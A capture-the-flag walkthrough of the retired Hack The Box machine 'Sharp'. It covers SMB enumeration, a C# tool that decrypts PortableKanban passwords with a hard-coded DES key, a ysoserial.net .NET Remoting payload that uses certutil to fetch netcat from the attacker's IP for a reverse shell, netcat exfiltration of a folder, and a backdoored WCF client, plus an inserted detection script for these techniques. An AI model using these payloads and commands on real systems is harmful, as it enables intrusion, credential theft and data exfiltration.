This post documents the complete walkthrough of Sharp, a retired vulnerable VM created by cube0x0, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

Background

Sharp is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports on the host.

masscan -e tun0 -p1-65535,U:1-65535 10.10.10.219 --rate=500

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-12-07 01:38:13 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 445/tcp on 10.10.10.219
Discovered open port 139/tcp on 10.10.10.219
Discovered open port 8889/tcp on 10.10.10.219
Discovered open port 8888/tcp on 10.10.10.219
Discovered open port 135/tcp on 10.10.10.219
Discovered open port 5985/tcp on 10.10.10.219

Sure looks like a Windows machine. Let’s do one better with nmap scanning the discovered ports to establish their services.

nmap -n -v -Pn -p135,139,445,5985,8888,8889 -A --reason 10.10.10.219 -oN nmap.txt
...
PORT     STATE SERVICE            REASON          VERSION
135/tcp  open  msrpc              syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn        syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?      syn-ack ttl 127
5985/tcp open  http               syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8888/tcp open  storagecraft-image syn-ack ttl 127 StorageCraft Image Manager
8889/tcp open  mc-nmf             syn-ack ttl 127 .NET Message Framing

Ports 8888/tcp and 8889/tcp sure look interesting. We’ll keep them in view and revisit them later.

SMB Enumeration with smbmap

Since 445/tcp is available, let’s see what smbmap can offer.

smbmap -H 10.10.10.219 -R
[+] IP: 10.10.10.219:445        Name: 10.10.10.219                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        dev                                                     NO ACCESS
        IPC$                                                    NO ACCESS       Remote IPC
        kanban                                                  READ ONLY
        .\kanban\*
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    .
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    ..
        fr--r--r--            58368 Sat Nov 14 18:57:04 2020    CommandLine.dll
        fr--r--r--           141312 Sat Nov 14 18:57:04 2020    CsvHelper.dll
        fr--r--r--           456704 Sat Nov 14 18:57:04 2020    DotNetZip.dll
        dr--r--r--                0 Sat Nov 14 18:57:59 2020    Files
        fr--r--r--            23040 Sat Nov 14 18:57:04 2020    Itenso.Rtf.Converter.Html.dll
        fr--r--r--            75776 Sat Nov 14 18:57:04 2020    Itenso.Rtf.Interpreter.dll
        fr--r--r--            32768 Sat Nov 14 18:57:04 2020    Itenso.Rtf.Parser.dll
        fr--r--r--            19968 Sat Nov 14 18:57:04 2020    Itenso.Sys.dll
        fr--r--r--           376832 Sat Nov 14 18:57:04 2020    MsgReader.dll
        fr--r--r--           133296 Sat Nov 14 18:57:04 2020    Ookii.Dialogs.dll
        fr--r--r--          2558011 Sat Nov 14 18:57:04 2020    pkb.zip
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    Plugins
        fr--r--r--             5819 Sat Nov 14 18:57:04 2020    PortableKanban.cfg
        fr--r--r--           118184 Sat Nov 14 18:57:04 2020    PortableKanban.Data.dll
        fr--r--r--          1878440 Sat Nov 14 18:57:04 2020    PortableKanban.exe
        fr--r--r--            31144 Sat Nov 14 18:57:04 2020    PortableKanban.Extensions.dll
        fr--r--r--             2080 Sat Nov 14 18:57:04 2020    PortableKanban.pk3
        fr--r--r--             2080 Sat Nov 14 18:57:04 2020    PortableKanban.pk3.bak
        fr--r--r--               34 Sat Nov 14 18:57:04 2020    PortableKanban.pk3.md5
        fr--r--r--           413184 Sat Nov 14 18:57:04 2020    ServiceStack.Common.dll
        fr--r--r--           137216 Sat Nov 14 18:57:04 2020    ServiceStack.Interfaces.dll
        fr--r--r--           292352 Sat Nov 14 18:57:04 2020    ServiceStack.Redis.dll
        fr--r--r--           411648 Sat Nov 14 18:57:04 2020    ServiceStack.Text.dll
        fr--r--r--          1050092 Sat Nov 14 18:57:04 2020    User Guide.pdf
        .\kanban\Plugins\*
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    .
        dr--r--r--                0 Sat Nov 14 18:57:04 2020    ..
        fr--r--r--            64424 Sat Nov 14 18:57:04 2020    PluginsLibrary.dll

We’d better download all of them to have a better look.

smbget -a -R smb://10.10.10.219/kanban
Using workgroup WORKGROUP, guest user
smb://10.10.10.219/kanban/CommandLine.dll
smb://10.10.10.219/kanban/CsvHelper.dll
smb://10.10.10.219/kanban/DotNetZip.dll
smb://10.10.10.219/kanban/Itenso.Rtf.Converter.Html.dll
smb://10.10.10.219/kanban/Itenso.Rtf.Interpreter.dll
smb://10.10.10.219/kanban/Itenso.Rtf.Parser.dll
smb://10.10.10.219/kanban/Itenso.Sys.dll
smb://10.10.10.219/kanban/MsgReader.dll
smb://10.10.10.219/kanban/Ookii.Dialogs.dll
smb://10.10.10.219/kanban/pkb.zip
smb://10.10.10.219/kanban/Plugins/PluginsLibrary.dll
smb://10.10.10.219/kanban/PortableKanban.cfg
smb://10.10.10.219/kanban/PortableKanban.Data.dll
smb://10.10.10.219/kanban/PortableKanban.exe
smb://10.10.10.219/kanban/PortableKanban.Extensions.dll
smb://10.10.10.219/kanban/PortableKanban.pk3
smb://10.10.10.219/kanban/PortableKanban.pk3.bak
smb://10.10.10.219/kanban/PortableKanban.pk3.md5
smb://10.10.10.219/kanban/ServiceStack.Common.dll
smb://10.10.10.219/kanban/ServiceStack.Interfaces.dll
smb://10.10.10.219/kanban/ServiceStack.Redis.dll
smb://10.10.10.219/kanban/ServiceStack.Text.dll
smb://10.10.10.219/kanban/User Guide.pdf
Downloaded 7.90MB in 7 seconds

Encrypted Passwords

I found the presence of two encrypted passwords in PortableKanban.pk3.bak, belonging to Administrator and lars respectively.

Decryption in Portable Kanban

Portable Kanban is developed in C# and the decryption function is found in PortableKanban.Data.dll.

Armed with this insight, it’s actually pretty easy to write a decryption program in Mono.

decrypt.cs
using System;
using System.IO;
using System.Security.Cryptography;
using System.Text;

public class Program
{
    // Hard-coded DES key and IV, as found in PortableKanban.Data.dll.
    // With the key shipped inside the application, the "encrypted"
    // passwords in the .pk3 file are recoverable by anyone who can read it.
    private static byte[] iv  = Encoding.ASCII.GetBytes("XuVUm5fR");
    private static byte[] key = Encoding.ASCII.GetBytes("7ly6UznJ");

    public static void Main(string[] args)
    {
        if (args.Length != 1)
        {
            Console.Error.WriteLine("usage: decrypt.exe <base64-ciphertext>");
            return;
        }

        string cryptedString = args[0];

        // DESCryptoServiceProvider defaults to CBC mode with PKCS7 padding,
        // matching what the application uses.
        using (DESCryptoServiceProvider des = new DESCryptoServiceProvider())
        using (MemoryStream ms = new MemoryStream(Convert.FromBase64String(cryptedString)))
        using (CryptoStream cs = new CryptoStream(ms, des.CreateDecryptor(key, iv), CryptoStreamMode.Read))
        using (StreamReader reader = new StreamReader(cs))
        {
            Console.WriteLine(reader.ReadToEnd());
        }
    }
}

Compile decrypt.cs with mcs. This will produce decrypt.exe.

mcs decrypt.cs

And then run it with mono.

The backed-up password of Administrator is [email protected]$btRSHJYTarg.

The backed-up password of lars is G123HHrth234gRG.

More SMB Enumeration

Armed with a list of usernames and passwords, albeit a miserly two pairs, we can use CrackMapExec to validate these credentials.

Bingo. Remember that there was another shared folder dev? Turns out that lars has read access.

smbmap -H 10.10.10.219 -u lars -p 'G123HHrth234gRG' -R
[+] IP: 10.10.10.219:445        Name: 10.10.10.219
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        dev                                                     READ ONLY
        .\dev\*
        dr--r--r--                0 Sun Nov 15 11:30:13 2020    .
        dr--r--r--                0 Sun Nov 15 11:30:13 2020    ..
        fr--r--r--             5632 Sun Nov 15 10:25:01 2020    Client.exe
        fr--r--r--               70 Sun Nov 15 13:59:02 2020    notes.txt
        fr--r--r--             4096 Sun Nov 15 10:25:01 2020    RemotingLibrary.dll
        fr--r--r--             6144 Mon Nov 16 11:55:44 2020    Server.exe
        IPC$                                                    READ ONLY       Remote IPC
        .\IPC$\*
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    InitShutdown
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    lsass
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    ntsvcs
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    scerpc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-364-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    epmapper
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-1e4-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    LSM_API_service
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    eventlog
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-194-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    atsvc
        fr--r--r--                4 Mon Jan  1 00:00:00 1601    wkssvc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-448-0
        fr--r--r--                3 Mon Jan  1 00:00:00 1601    W32TIME_ALT
        fr--r--r--                5 Mon Jan  1 00:00:00 1601    srvsvc
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    vgauth-service
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-268-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    Winsock2\CatalogChangeListener-270-0
        fr--r--r--                1 Mon Jan  1 00:00:00 1601    PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
        kanban                                                  NO ACCESS

Same thing. We’d better download all the files.

smbget -R -U'lars%G123HHrth234gRG' smb://10.10.10.219/dev
Using workgroup WORKGROUP, user lars
smb://10.10.10.219/dev/Client.exe
smb://10.10.10.219/dev/notes.txt
smb://10.10.10.219/dev/RemotingLibrary.dll
smb://10.10.10.219/dev/Server.exe
Downloaded 15.57kB in 0 seconds

I’ve a feeling we are going to see more .NET C# stuff in this one.

.NET Remoting Deserialization Vulnerability

Indeed. Check this out.

notes.txt
Todo:
    Migrate from .Net remoting to WCF
    Add input validation

If I had to guess, I would say this (.NET Remoting) is what’s behind port 8888/tcp.

Taking a leaf from James Forshaw’s excellent write-up on exploiting .NET Remoting, we can use his tool and ysoserial.net to gain a foothold.

Foothold

To do that, we need to switch over to a Windows environment, preferably COMMANDO VM, where we have a working copy of Visual Studio 2019 Community Edition, because we need to build James Forshaw’s ExploitRemotingService.exe and ysoserial.net’s ysoserial.exe. The instructions to build them are beyond the scope of this write-up.

ysoserial.net payload

To generate the payload, use the following command. I’m using this nc64.exe. You need to host the executable on an HTTP server; I’m using Python 3’s http.server module.

ysoserial -f BinaryFormatter -o raw -g TypeConfuseDelegate -c "mkdir \temp && certutil -urlcache -split -f http://10.10.16.125/nc64.exe \temp\cute.exe && start \temp\cute.exe 10.10.16.125 1234 -e cmd.exe" > payload.bin

ExploitRemotingService.exe

To send the payload over .NET Remoting, use James Forshaw’s ExploitRemotingService.exe.

ExploitRemotingService -s --ver=4 --nulluri --user="lars" --pass="G123HHrth234gRG" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw payload.bin

We need to supply lars’ credentials as well.

Bingo, we have shell!
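The foothold above leaves a recognisable trail on the target: the .NET Remoting server spawning a shell, certutil being used as a download cradle, and a netcat-style binary started with -e cmd.exe. The following is an added example (not part of the original write-up) of a small detection pass over process-creation telemetry. The events are constructed for the example and follow Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); the path of Server.exe on the target and the fact that it launches cmd.exe directly are assumptions.

```python
"""Toy detection pass over constructed Windows process-creation events.

Added example, not code from the original write-up. Field names follow
Sysmon Event ID 1 (Image, ParentImage, CommandLine); the events and the
location of Server.exe (the .NET Remoting host from the dev share) are
made up for this example.
"""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    image: str
    parent_image: str
    command_line: str


def parse_event(line: str) -> ProcEvent:
    """Parse one 'Key=Value|Key=Value' telemetry line (constructed format)."""
    fields = {}
    for part in line.strip().split("|"):
        key, _, value = part.partition("=")
        fields[key] = value
    return ProcEvent(fields["Image"], fields["ParentImage"], fields["CommandLine"])


# Constructed sample telemetry; not real logs from the box. The first event
# models the remoting server launching cmd.exe with the deserialized payload,
# the last two are benign-looking noise to show the rules do not over-fire.
SAMPLE_LINES = [
    r"Image=C:\Windows\System32\cmd.exe|ParentImage=C:\dev\Server.exe|CommandLine=cmd /c mkdir \temp && certutil -urlcache -split -f http://10.10.16.125/nc64.exe \temp\cute.exe && start \temp\cute.exe 10.10.16.125 1234 -e cmd.exe",
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -urlcache -split -f http://10.10.16.125/nc64.exe \temp\cute.exe",
    r"Image=C:\temp\cute.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=\temp\cute.exe 10.10.16.125 1234 -e cmd.exe",
    r"Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil -hashfile C:\temp\wcf.tar MD5",
    r"Image=C:\Windows\System32\tar.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=tar -cf wcf.tar wcf",
]

# certutil using its URL cache to fetch content over http(s): the LOLBin
# download cradle used in the payload above. Hashing with certutil is benign.
CERTUTIL_DOWNLOAD = re.compile(r"\bcertutil(\.exe)?\b.*\s-urlcache\b.*\bhttps?://", re.I)

# "-e cmd.exe" / "-e powershell.exe": a netcat-style program binding a shell to a socket.
NETCAT_EXEC = re.compile(r"(?:^|\s)-e\s+(?:cmd|powershell)(?:\.exe)?(?:\s|$)", re.I)

SHELLS = ("\\cmd.exe", "\\powershell.exe")
REMOTING_SERVER = "\\server.exe"  # assumed process name of the .NET Remoting host


def rule_certutil_download(ev: ProcEvent) -> bool:
    return CERTUTIL_DOWNLOAD.search(ev.command_line) is not None


def rule_netcat_exec(ev: ProcEvent) -> bool:
    return NETCAT_EXEC.search(ev.command_line) is not None


def rule_remoting_spawns_shell(ev: ProcEvent) -> bool:
    """A service that deserializes client input has no business spawning a shell."""
    return (ev.parent_image.lower().endswith(REMOTING_SERVER)
            and ev.image.lower().endswith(SHELLS))


RULES = {
    "certutil_download_cradle": rule_certutil_download,
    "netcat_exec_flag": rule_netcat_exec,
    "remoting_server_spawns_shell": rule_remoting_spawns_shell,
}


def detect(lines):
    """Return, per input line, the sorted names of the rules it triggers."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        hits.append(sorted(name for name, rule in RULES.items() if rule(ev)))
    return hits


if __name__ == "__main__":
    for line, names in zip(SAMPLE_LINES, detect(SAMPLE_LINES)):
        status = ", ".join(names) if names else "no match"
        print(f"{status:70s} <- {line.split('|CommandLine=')[1]}")
```

The parent/child rule is the one worth keeping in production: command-line patterns change with every tool, but a listener that deserializes untrusted input and then forks cmd.exe or powershell.exe is a strong signal regardless of what the payload does.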

Getting user.txt

The file user.txt is at lars’ Desktop.

Privilege Escalation

During enumeration of lars’ account, I noticed the presence of a folder wcf. It appears that lars has migrated the client-server architecture to Windows Communication Foundation (WCF).

Exfiltrating the entire wcf folder

How are we going to do that?

Archiving the folder into a single file

Good thing there’s tar.exe in Windows 10 and later; we can tar the wcf folder and send it across to my analysis machine (COMMANDO VM) with netcat.

On my analysis machine

nc -lnvp 9999 > wcf.tar

From lars’ shell

Note: I’ve renamed nc64.exe to cute.exe in case you are wondering what’s cute.exe. :laughing:

tar -cf wcf.tar wcf
cute 10.10.16.125 9999 < wcf.tar

This is what’s in the wcf folder.

Windows Communication Foundation

Long story short, there’s a WcfServer.exe listening on 8889/tcp on the remote machine. If I had to guess, I would say that it’s running with Administrator or NT AUTHORITY\SYSTEM privileges, because there are no other users.

It has to be, right? Assuming I’m right, check out what the remote service contract has to offer.

Backdooring WcfClient.exe

Armed with that information, we can backdoor WcfClient.exe with InvokePowershell and call it a day.

Getting root.txt

Rebuild the solution and transfer WcfClient.exe and WcfRemotingLibrary.dll to C:\temp over at lars’ shell.

Note: I’ve renamed WcfClient.exe to sweet.exe in case you are wondering what’s sweet.exe. :laughing:

Download the backdoored WcfClient.exe from lars’ shell like so.

powershell -c iwr http://10.10.16.125/WcfClient.exe -outf .\sweet.exe

The end is here…

:dancer: